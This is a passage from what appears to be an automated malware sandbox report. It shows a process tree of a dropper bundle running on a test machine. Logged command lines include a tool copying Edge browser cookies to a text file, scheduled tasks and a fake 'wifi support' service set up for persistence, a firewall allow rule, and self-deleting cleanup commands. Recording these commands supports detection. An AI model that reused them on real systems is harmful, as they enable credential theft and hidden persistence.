                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                            PID:7100
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                              PID:6976
                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\7ggAh3WEuUCExhwbSADjStwF.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\7ggAh3WEuUCExhwbSADjStwF.exe"
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                          PID:4484
                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\r3DKZdq51YIfzkSkgFaVE5_6.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\r3DKZdq51YIfzkSkgFaVE5_6.exe"
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          PID:4436
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im "r3DKZdq51YIfzkSkgFaVE5_6.exe" /f & erase "C:\Users\Admin\Documents\r3DKZdq51YIfzkSkgFaVE5_6.exe" & exit
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:5772
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                taskkill /im "r3DKZdq51YIfzkSkgFaVE5_6.exe" /f
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                PID:6104
                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\GqWzaeb0tc4irCTluZZUfuNH.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\GqWzaeb0tc4irCTluZZUfuNH.exe"
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                            PID:4372
                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                          schtasks.exe /create /tn "E2TVZbBMO7Ololsin2WDUYNn" /sc ONLOGON /tr "'C:\Documents and Settings\E2TVZbBMO7Ololsin2WDUYNn.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                          PID:4496
                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                          schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\WindowsShell\explorer.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                          PID:5664
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-IF78T.tmp\MediaBurner2.tmp
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-IF78T.tmp\MediaBurner2.tmp" /SL5="$1039C,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                          PID:5440
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-VVVSO.tmp\ultradumnibour.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-VVVSO.tmp\ultradumnibour.exe" /S /UID=burnerch2
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • Drops file in Drivers directory
                                                                                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                                                                                            PID:6292
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\TRERWYBHFO\ultramediaburner.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\TRERWYBHFO\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:6924
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-80ABD.tmp\ultramediaburner.tmp
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-80ABD.tmp\ultramediaburner.tmp" /SL5="$5026E,281924,62464,C:\Users\Admin\AppData\Local\Temp\TRERWYBHFO\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                  PID:5248
                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                      PID:7328
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\64-8b211-5cc-96abb-b444544e42ce1\SHicidusatu.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\64-8b211-5cc-96abb-b444544e42ce1\SHicidusatu.exe"
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:6320
                                                                                                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                                                                                                                                                      dw20.exe -x -s 2456
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                        PID:8672
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\25-2aaf9-73f-6a283-7f46fe63817b7\Xokefazhata.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\25-2aaf9-73f-6a283-7f46fe63817b7\Xokefazhata.exe"
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:5908
                                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wdapotnb.j2w\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                            PID:8416
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\wdapotnb.j2w\GcleanerEU.exe
                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\wdapotnb.j2w\GcleanerEU.exe /eufive
                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                PID:8672
                                                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mauj4lub.mtg\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                PID:8976
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\mauj4lub.mtg\installer.exe
                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\mauj4lub.mtg\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                    PID:7484
                                                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xbu2fqv1.gqm\askinstall52.exe & exit
                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                    PID:4628
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\xbu2fqv1.gqm\askinstall52.exe
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\xbu2fqv1.gqm\askinstall52.exe
                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                        PID:8372
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                          PID:1332
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                            taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                                                            PID:5616
                                                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zyzspphw.whh\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                        PID:6712
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\zyzspphw.whh\gcleaner.exe
                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\zyzspphw.whh\gcleaner.exe /mixfive
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                            PID:7044
                                                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y0vudtkw.adm\autosubplayer.exe /S & exit
                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                          PID:3544
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-PTAIM.tmp\WEATHER Manager.tmp
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-PTAIM.tmp\WEATHER Manager.tmp" /SL5="$10384,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                    PID:5312
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-7E36H.tmp\Setup.exe
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-7E36H.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                                                                                                                      • Modifies system certificate store
                                                                                                                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                      PID:196
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-7E36H.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-7E36H.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629557307 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                          PID:2680
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:3904
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                        PID:5868
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                        schtasks.exe /create /tn "lp5Ek30UaGG63InHbBbIPwwY" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\lp5Ek30UaGG63InHbBbIPwwY.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                        PID:6308
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                        schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\System32\wbem\sppwmi\WmiPrvSE.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                        PID:6172
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                        C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                                        PID:7940
                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 092FC473D5F93C1F58C9079C1C850138 C
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                          PID:5608
                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 8FB590DDE915154EE52D7D68E10E10DE C
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                          PID:7116
                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 9A88849C0CF5D928B49B096DF73E8A37
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                          PID:8112
                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 6BA59E9540E1D55282CFF13FEB9DDE01 C
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                          PID:8696
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                        schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Windows\System32\wsnmp32\sihost.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                        PID:4952
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                        PID:6200
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                          PID:6352
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                        schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Windows\System32\DuCsps\spoolsv.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                        PID:7068
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                                                                        PID:5848
                                                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                          PID:7116
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                            PID:5808
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                            PID:5476
                                                                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                              PID:6196
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                PID:8224
                                                                                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                  PID:8344
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                    PID:8488
                                                                                                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                      PID:8648
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1E10.exe
                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\1E10.exe
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                        PID:6076
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\3E7A.exe
                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\3E7A.exe
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                          PID:6524
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\5956.exe
                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\5956.exe
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                                                                                          PID:2396
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im 5956.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\5956.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                              PID:3788
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                taskkill /im 5956.exe /f
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                PID:4800
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                timeout /t 6
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                PID:7284
                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                            PID:7196
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                                                              PID:9152
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\BE79.exe
                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\BE79.exe
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                            PID:6140
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\E5B9.exe
                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\E5B9.exe
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                              PID:6268
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\hyedlibw\
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                  PID:8712
                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                    PID:6076
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\hqywpruu.exe" C:\Windows\SysWOW64\hyedlibw\
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                    PID:8984
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\sc.exe" create hyedlibw binPath= "C:\Windows\SysWOW64\hyedlibw\hqywpruu.exe /d\"C:\Users\Admin\AppData\Local\Temp\E5B9.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                      PID:9384
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\sc.exe" description hyedlibw "wifi internet conection"
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                        PID:9488
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\sc.exe" start hyedlibw
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                          PID:9592
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                            PID:9704
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\D66.exe
                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\D66.exe
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                            PID:8576
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\2DD0.exe
                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\2DD0.exe
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                            PID:8656
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\583D.exe
                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\583D.exe
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                              PID:5200
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\583D.exe
                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\583D.exe"
                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                • Modifies system certificate store
                                                                                                                                                                                                                                                                                                                                PID:4052
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                PID:8400
                                                                                                                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                  PID:7572
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                    PID:8420
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                      PID:7300
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                        PID:8808
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                          PID:7572
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                            PID:3108
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
